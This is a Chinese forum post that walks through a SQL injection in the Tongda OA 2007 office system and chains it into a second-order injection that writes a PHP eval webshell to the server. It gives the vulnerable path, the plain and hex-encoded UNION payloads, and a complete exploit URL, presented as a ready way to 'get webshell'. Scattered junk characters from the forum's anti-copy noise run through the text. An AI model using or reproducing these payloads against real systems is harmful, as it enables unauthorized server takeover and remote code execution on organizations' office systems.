找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2504|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本
$ u0 V% \( ~% V' [$ }% K0 t( N6 s6 d+ ?- n4 q! X7 x8 a
! [  t6 h$ R, L2 q+ M' ~# F1 n  ~
Office Anywhere 2007 网络智能办公系统! S$ c7 R: I1 z4 h, R
/ ^5 ?( [9 q7 V3 b* C) O; p
http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录.., u& N5 N# M  Y

9 D1 i) C' R: L4 P  n
1 Z8 m7 M' a2 S" S+ R& s- h* a- F: {这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
5 V% f6 T4 W+ n
$ W& ^2 T7 m: W/ m0 E例如:SELECT * from USER where USER_ID='{$USERNAME}'  
  ?0 |$ V% d7 ^/ K其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了. o* x6 j+ }8 V
7 U$ U; ?1 v8 _
这个时候我们是不是可以组合起来使用哪?% F7 N# h% T" T9 T9 f
& a, V5 H1 ]" {% C
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样. J+ }: a8 V7 B$ y! g, V. f
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
+ h6 b0 d- x( ]" ^& L- {. a
6 a  I6 I6 E- h" ]3 ?这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了0 E/ N9 a3 ^8 V) l6 i8 [
* c, D: x5 i0 w  A/ F. h2 [  U
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
( h4 @* ]/ @/ u2 E+ Y8 x ( M7 r. A) J  q8 B( W: G1 _! j
那么我们用字符串格式带入进行hex编码$ D) h7 p+ N' _: F. b1 p
3 z$ J0 p! p/ ^7 d9 h+ Q2 k
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
0 X1 b- \& o1 b0 M) w( V5 q
" J2 l9 D8 R# |% m7 J9 `- Q; H8 q测试ok,获取oa的webshell
" \! Q. p, T; [ 8 N$ L! U& e$ v) g: m

% g$ t& C' D$ f2 w! kpda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%239 M8 n3 S0 E( G4 Y6 }
直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表